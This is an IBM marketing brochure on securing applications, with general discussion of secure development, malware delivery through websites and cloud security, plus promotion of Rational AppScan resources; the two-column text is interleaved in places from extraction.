Escolar Documentos
Profissional Documentos
Cultura Documentos
Securing today’s
applications
Design, deliver and secure smarter software and services
2 Securing today’s applications
• efine risk thresholds and specify when the security team will
D
terminate application services.
• Categorize applications by risk factors (e.g., Internet or
intranet vs. extranet).
• Generate periodic risk reports based on security scans that
match issues to defined risk thresholds.
• Maintain a database that can analyze and rank applications by
risk, so you can inform teams of how their applications stack
up against deployed systems.
Secure by Design
Innovation depends upon the safe and reliable operation of the
systems that will gather, transmit and analyze data,
communicate and act upon the results and advance the
capabilities of highly distributed organizations to unify and
focus on critical shared goals. This type of security, this type of
safety, is not something that can simply be bolted onto the
solutions as an afterthought. It must be considered from the
first requirements to the final implementation, and it must be
inherent in the capabilities that are brought to bear as these
complex problems are solved. The reliability of these solutions
cannot be jeopardized by delay. They must be Secure by Design.
Securing components and systems from their inception Fact: There might be initial delays to the development cycle as
produces a flexibility and sense of assurance that fuels the individuals learn the new system, but this is indisputably the
growth and adaptability of the Smarter Planet. Early most time-efficient method for reducing software risk. The
implementations of smarter projects are only the beginning of process eventually reduces development time by instilling
the potential for integrating information and technology to good, secure coding practices among developers, and these
solve fundamental infrastructural problems. Systems which are practices reduce time spent elsewhere in the cycle, such as
gathering information to optimize a Smarter City today may during security and acceptance testing of the final application.
well be repurposed in the future to bring smarter healthcare or
smarter communications to the same area. By designing the Fiction: We are already doing peer review; therefore, we do
core components with security in mind, adapting them to a not need additional security code reviews.
new area of use becomes much more straightforward,
eliminating the need to re-engineer the component for the Fact: A peer review is not a substitute for a security review.
next role it may fulfill. Peer reviews are typically used to find functional bugs. Unless
reviewers have a deep understanding of application security,
Roadblocks to building in security many of the more critical security vulnerabilities and design
Among the most common impediments to the adoption of flaws are missed. In many cases, the best-intentioned user
security testing in the software development life cycle, the requirement implemented without functional error can lead to
most difficult to overcome is typically the gap between the greatest security risk. Common security errors will traverse
development group functions and the security team’s priorities. thousands of lines of code and many files, leading to a very
The skill sets themselves are rarely present in the same challenging, if not impossible, task of manual identification.
individual or even group, and organizationally there is very
little inherent synergy. While development goals focus on Assigning core responsibilities
product functionality and on-schedule delivery, security Many enterprises still find it challenging to identify the most
analysts are often tasked with eliminating vulnerabilities and appropriate method and resources to implement source code
implementing security controls only after the applications are analysis in their development life cycle. Utilizing a series of
completed and deployed. Development is rewarded for workflow models to help guide the implementation of
on-time delivery, while security is rewarded for preventing the automated source code scanning into an existing development
deployment of an insecure application. To effectively decrease process is the most effective way to achieve a favorable
vulnerabilities created during the development process, approach. Although it is clear that development organizations
development and security teams must cooperate, and in all
cases, higher-level management support for improving security
during development is essential.
Hackers and Malware this. A pop-up designed to look like an antivirus alert may read
“A virus has been detected on your system” and prompt a user
The proliferation of malware designed to infiltrate computer
to download a cleanup utility, which is actually malware (often
systems without the owners’ informed consent has become one
a Trojan horse). In the fall of 2009, a major national newspaper
of the most challenging security issues facing users today.
in the United States faced a version of this tactic in the form of
Hackers are engineering ever more sophisticated viruses,
a scam that was designed to scare users into buying useless
worms and Trojan horses that can outsmart traditional defense
antivirus software.
mechanisms.
In recent years, occurrences of legitimate websites serving
Malicious software can be distributed in a variety of ways,and
malware have become more widespread. Previously, cautious
attackers generally do not limit themselves to a single channel.
web surfers who avoided questionable sites, such as adult-
For a long time, email was the primary delivery mechanism,
oriented or illegal download sites, could reasonably expect to
and it is still significant today. Network vulnerabilities and
avoid attacks. This is not so today. Moreover, site owners rarely
instant messaging have also been used for pushing worms from
even know that the compromise has occurred. Consider the
one machine to another.
consequences. Users are no longer able to avoid exposure
through good judgment alone. The malware is delivered
Today, web applications are the primary delivery mechanisms
through the sites they use and trust on a regular basis—for
for malware via “drive-by downloads” or “social engineering.”
personal and business needs. Web gateways can no longer rely
A drive-by download happens when a user’s machine becomes
on blacklists of malicious sites without blocking legitimate sites
compromised simply by browsing an infected web page. The
as well. So how are users expected to protect themselves, and
browser executes components that are maliciously crafted to
how can website owners avoid putting their users in harm’s
exploit vulnerabilities in the browser, operating system or other
way? That question can’t be addressed without understanding
plug-ins as the page renders images, in-line scripts and videos,
how legitimate sites are compromised.
for example.
A look at how legitimate websites are compromised
Social engineering is a term used to describe tricking a user
In most cases, reputable websites are attacked using one or a
into performing some action, such as downloading a file or
combination of four primary methods.
accepting a prompt. “Scareware,” such as an alarming pop-up
that prompts users to perform an action, is a good example of Vulnerability exploitation
Vulnerabilities on a site are a favorite target of criminals. These
could be 0-day vulnerabilities in the software running the
website or vulnerabilities in the application-specific code. Such
vulnerabilities can allow attackers to deface the site, making it
link or serve malicious content. Exploiting 0-day or very recent
vulnerabilities in web infrastructure (for example, web servers,
application servers and operating systems) is the primary
method of compromising websites today.
security tools. But this will only get them so far. As a result,
website owners have significant responsibilities in the matter,
as their users should expect a reasonable level of protection
against malicious code.
Existing solutions Please see the demo of Rational AppScan std edition for a
How can users be expected to protect themselves from full view of the the AppScan Standard Edition and Express
products.
malware on legitimate websites? Certainly, users need to take
precautions by installing appropriate endpoint security
solutions, such as antivirus software, firewalls and other
SWG Rational Marketing Software Delivery Program
Security and Cloud Computing Infrastructure sharing calls for a high degree of standardized
and process automation, which can help improve security by
Cloud computing is a flexible, cost-effective and proven
eliminating the risk of operator error and oversight. However,
delivery platform for providing business or consumer IT
the risks inherent with a massively-shared infrastructure mean
services over the Internet. Cloud resources can be rapidly
that cloud computing models must still place a strong emphasis
deployed and easily scaled, with all processes, applications and
on isolation, identity and compliance. In other words, the
services provided “on demand,” regardless of user location or
framework of governance, risk management and compliance
device. As a result, cloud computing gives organizations the
can be broken into five security focus areas:
opportunity to increase their service delivery efficiencies,
streamline IT management and better align IT services with
• People and Identity: Address the risks associated with user
dynamic business requirements.
access to corporate resources
• Data and Information: Understand, deploy and properly test
Both public and private cloud models are now in use. Available
controls for access to and usage of sensitive business data
to anyone with Internet access, public models include Software
• Application and Process: Help keep applications secure,
as a Service (SaaS) clouds like IBM LotusLive™, Platform as a
protected from malicious or fraudulent use, and hardened
Service (PaaS) clouds such as IBM Computing on Demand,
against failure
and Security and Data Protection as a Service (SDPaaS) clouds
• Network, Server and End Point: Optimize service availability
like the IBM Vulnerability Management Service.
by mitigating risks to network components
• Physical Infrastructure: Provide actionable intelligence on the
Private clouds are owned and used by a single organization.
desired state of physical infrastructure security and make
They offer many of the same benefits as public clouds, and
improvements
they give the owner organization greater flexibility and control.
Each focus area has its own value proposition and
Many organizations embrace both public and private cloud
corresponding financial payback that must be balanced.
computing by integrating the two models into hybrid clouds.
These hybrids are designed to meet specific business and
While cloud computing is often seen as increasing security
technology requirements, helping optimize security and
risks and introducing new threat vectors, it also presents an
privacy with a minimum investment in fixed IT costs. Although
exciting opportunity to improve security. Characteristics of
the benefits of cloud computing are clear, so is the need to
clouds such as standardization, automation and increased
develop proper security for cloud implementations.
visibility into the infrastructure can dramatically boost security
levels. For example, the use of a defined set of cloud interfaces,
In addition to the usual challenges of developing secure IT
along with centralized identity and access control policies, will
systems, cloud computing presents an added level of risk
reduce the risk of user access to unrelated resources. Running
because essential services are often outsourced to a third party.
computing services in isolated domains, providing default
The “externalized” aspect of outsourcing makes it harder to
encryption of data in motion and at rest, and controlling data
maintain data integrity and privacy, support data and service
through virtual storage have all become activities that can
availability and demonstrate compliance. As a result, clients
improve accountability and reduce the loss of data. In addition,
must establish trust relationships with their providers and
automated provisioning and reclamation of hardened run-time
understand risk in terms of how these providers implement,
images can reduce the attack surface and improve forensics.
deploy and manage security on their behalf. This “trust but
verify” relationship between cloud service providers and clients
is critical because the clients are still ultimately responsible for
compliance and protection of their critical data, even if that For more information on how the Rise of Cloud is creating
new requirements for Security please see our podcast.
workload has moved to the cloud.
10 Securing today’s applications
Security in Industry
Industry specific software assets that allow you to deploy
business solution with lower costs and risk:
Healthcare: Securing sensitive patient information and Please review the case study of an International
adhering to compliance mandates is an overwhelming Telecommunications Company.
requirement for all healthcare professionals at every level of
the industry. With funding for use of Electronic Health
SWG Rational Marketing Software Delivery Program
Resources Whitepapers:
Web Application Security e-Kit Poneman Business case for Data Protection (US)
IBM Rational AppScan can help you effectively design security Poneman Business case for Data Protection (UK)
into your products and services early in the lifecycle, in a way The Business Case for Data Protection was conducted by
which is resilient to change. Download your complimentary Ponemon Institute and sponsored by Ounce Labs, an IBM
e-Kit now. You’ll receive white papers, demos, podcasts and Company. It is the first study to determine what senior
additional information on helping you design, deliver, and executives think about the value proposition of corporate data
manage smarter software and services faster, in a more secure protection efforts within their organizations
and cost-efficient manner.
The Right Tool for the Right Job
Rational AppScan ROI Calculator A range of application security tools was developed to support
Automated application security analysis enables you to detect the efforts to secure the enterprise from the threat posed by
exploitable vulnerabilities to protect against the threat of insecure applications. This white paper examines the most
cyber-attack and also significantly reduces costs associated with common tools found in the enterprise application security
manual vulnerability testing. This Rational AppScan ROI environment.
calculator will help provide estimates on your ROI from
implementing a web application security testing solution Trust, but Verify
This white paper will discuss the need for addressing security
Podcasts: concerns in outsourced applications. Will outline a framework
“What, Why and How of Application Security” for addressing these concerns with outsourcing partners and
In this podcast you can learn how application security strategy explore the role of source code review and related technologies
and policy can mitigate risk and thus safeguard not only your to assess and certify outsourced applications.
company’s informational assets but also your bottom line and
brand. Knowledge is Power
Your software has a lot to say about data privacy. Your software
“Rise of Cloud is creating new requirements for Security” is the engine for your data, where it gets processed,
In this BizTech Reports podcast, David Grant discusses the transformed, and transmitted. Understanding what your
new and elevated role application security must play to protect software can tell you puts power in your hands.
vital corporate interests in as efficient a manner possible.
According to IBM X-Force’s most recent research from the Maintaining trust: protecting your website users from
end of 2008, over 50% of all vulnerabilities disclosed last year malware
were related to the application layer. This paper explores the problem of malware and how it is
increasingly being delivered through legitimate websites.
“Securing software at the source is good for Quality”
Hear from Ryan Berg, Security Architect, IBM on how to
promote secure software delivery starting in QA. Learn how to
you ensure that security standards are met as part of your
quality measures.
Demos:
IBM’s Development and Test Enterprise Cloud Solution © Copyright IBM Corporation 2010
IBM Smart Business Development & Test on the IBM Cloud
IBM Software Group
is your gateway to the cloud. With an ever-growing list of Route 100
images and functionality, you can provision, manage, and Somers, NY 10589
customize your instances in minutes. U.S.A.
ESW03001-USEN-01